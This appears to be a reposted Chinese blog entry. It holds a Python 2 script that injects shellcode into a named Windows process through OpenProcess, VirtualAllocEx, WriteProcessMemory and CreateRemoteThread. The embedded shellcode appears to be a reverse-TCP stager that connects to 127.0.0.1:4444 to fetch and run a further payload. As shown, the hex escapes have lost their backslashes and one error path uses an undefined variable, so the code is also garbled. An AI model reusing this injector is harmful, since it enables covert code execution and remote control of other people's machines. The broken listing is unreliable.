windows平台上用python 远程线程注入,执行shellcode

// 转自: https://blog.csdn.net/Jailman/article/details/77573990
import sys
import psutil  
import ctypes  
from ctypes import *  
  
PAGE_EXECUTE_READWRITE         = 0x00000040  
PROCESS_ALL_ACCESS =     ( 0x000F0000 | 0x00100000 | 0xFFF )  
VIRTUAL_MEM        =     ( 0x1000 | 0x2000 )  
  
kernel32      = windll.kernel32  
pName         = sys.argv[1]  
  
if not sys.argv[1]:  
    print "Code Injector: ./code_injector.py <name to inject>"  
    sys.exit(0)  
  
# shellcode =   
# "x31xd2xb2x30x64x8bx12x8bx52x0cx8bx52x1cx8bx42"  
# "x08x8bx72x20x8bx12x80x7ex0cx33x75xf2x89xc7x03"  
# "x78x3cx8bx57x78x01xc2x8bx7ax20x01xc7x31xedx8b"  
# "x34xafx01xc6x45x81x3ex46x61x74x61x75xf2x81x7e"  
# "x08x45x78x69x74x75xe9x8bx7ax24x01xc7x66x8bx2c"  
# "x6fx8bx7ax1cx01xc7x8bx7cxafxfcx01xc7x68x79x74"  
# "x65x01x68x6bx65x6ex42x68x20x42x72x6fx89xe1xfe"  
# "x49x0bx31xc0x51x50xffxd7";  
 
shellcode =  ""
shellcode += "xfcxe8x82x00x00x00x60x89xe5x31xc0x64x8b"
shellcode += "x50x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7"
shellcode += "x4ax26x31xffxacx3cx61x7cx02x2cx20xc1xcf"
shellcode += "x0dx01xc7xe2xf2x52x57x8bx52x10x8bx4ax3c"
shellcode += "x8bx4cx11x78xe3x48x01xd1x51x8bx59x20x01"
shellcode += "xd3x8bx49x18xe3x3ax49x8bx34x8bx01xd6x31"
shellcode += "xffxacxc1xcfx0dx01xc7x38xe0x75xf6x03x7d"
shellcode += "xf8x3bx7dx24x75xe4x58x8bx58x24x01xd3x66"
shellcode += "x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0"
shellcode += "x89x44x24x24x5bx5bx61x59x5ax51xffxe0x5f"
shellcode += "x5fx5ax8bx12xebx8dx5dx68x33x32x00x00x68"
shellcode += "x77x73x32x5fx54x68x4cx77x26x07xffxd5xb8"
shellcode += "x90x01x00x00x29xc4x54x50x68x29x80x6bx00"
shellcode += "xffxd5x6ax05x68x7fx00x00x01x68x02x00x11"
shellcode += "x5cx89xe6x50x50x50x50x40x50x40x50x68xea"
shellcode += "x0fxdfxe0xffxd5x97x6ax10x56x57x68x99xa5"
shellcode += "x74x61xffxd5x85xc0x74x0axffx4ex08x75xec"
shellcode += "xe8x61x00x00x00x6ax00x6ax04x56x57x68x02"
shellcode += "xd9xc8x5fxffxd5x83xf8x00x7ex36x8bx36x6a"
shellcode += "x40x68x00x10x00x00x56x6ax00x68x58xa4x53"
shellcode += "xe5xffxd5x93x53x6ax00x56x53x57x68x02xd9"
shellcode += "xc8x5fxffxd5x83xf8x00x7dx22x58x68x00x40"
shellcode += "x00x00x6ax00x50x68x0bx2fx0fx30xffxd5x57"
shellcode += "x68x75x6ex4dx61xffxd5x5ex5exffx0cx24xe9"
shellcode += "x71xffxffxffx01xc3x29xc6x75xc7xc3xbbxf0"
shellcode += "xb5xa2x56x6ax00x53xffxd5"
  
  
  
code_size     = len(shellcode)  
  
TH32CS_SNAPPROCESS = 0x00000002  
class PROCESSENTRY32(ctypes.Structure):  
     _fields_ = [("dwSize", ctypes.c_ulong),  
                 ("cntUsage", ctypes.c_ulong),  
                 ("th32ProcessID", ctypes.c_ulong),  
                 ("th32DefaultHeapID", ctypes.c_ulong),  
                 ("th32ModuleID", ctypes.c_ulong),  
                 ("cntThreads", ctypes.c_ulong),  
                 ("th32ParentProcessID", ctypes.c_ulong),  
                 ("pcPriClassBase", ctypes.c_ulong),  
                 ("dwFlags", ctypes.c_ulong),  
                 ("szExeFile", ctypes.c_char * 260)]  
  
# def getProcPid(procName):  
#     CreateToolhelp32Snapshot = ctypes.windll.kernel32.CreateToolhelp32Snapshot  
#     Process32First = ctypes.windll.kernel32.Process32First  
#     Process32Next = ctypes.windll.kernel32.Process32Next  
#     CloseHandle = ctypes.windll.kernel32.CloseHandle  
      
#     hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)  
      
#     pe32 = PROCESSENTRY32()  
#     pe32.dwSize = ctypes.sizeof(PROCESSENTRY32)  
#     if Process32First(hProcessSnap,ctypes.byref(pe32)) == False:  
#         return  
#     if pe32.szExeFile == procName:  
#         CloseHandle(hProcessSnap)  
#         return pe32.th32ProcessID  
      
#     while True:  
#         #yield pe32 #save the pe32  
#         if Process32Next(hProcessSnap,ctypes.byref(pe32)) == False:  
#             break  
#         if pe32.szExeFile == procName:  
#             CloseHandle(hProcessSnap)  
#             return pe32.th32ProcessID  
          
#     CloseHandle(hProcessSnap)  
 
 
def getProcName(pname):
    """ get process by name
    
    return the first process if there are more than one
    """
    for proc in psutil.process_iter():
        try:
            if proc.name().lower() == pname.lower():
                return str(proc).split('=')[1].split(',')[0]  # return if found one
        except psutil.AccessDenied:
            pass
        except psutil.NoSuchProcess:
            pass
    return None
 
  
procPid = int(getProcName(pName))  
# procPid = 40560
print procPid  
  
# Get a handle to the process we are injecting into.  
h_process = kernel32.OpenProcess( PROCESS_ALL_ACCESS, False, procPid )  
  
if not h_process:  
  
    print "[*] Couldn't acquire a handle to PID: %s" % pid  
    sys.exit(0)  
  
# Allocate some space for the shellcode  
arg_address = kernel32.VirtualAllocEx( h_process, 0, code_size, VIRTUAL_MEM, PAGE_EXECUTE_READWRITE)  
  
# Write out the shellcode  
written = c_int(0)  
kernel32.WriteProcessMemory(h_process, arg_address, shellcode, code_size, byref(written))  
  
# Now we create the remote thread and point it's entry routine  
# to be head of our shellcode  
thread_id = c_ulong(0)  
if not kernel32.CreateRemoteThread(h_process,None,0,arg_address,None,0,byref(thread_id)):  
  
    print "[*] Failed to inject process-killing shellcode. Exiting."  
    sys.exit(0)  
  
print "[*] Remote thread successfully created with a thread ID of: 0x%08x" % thread_id.value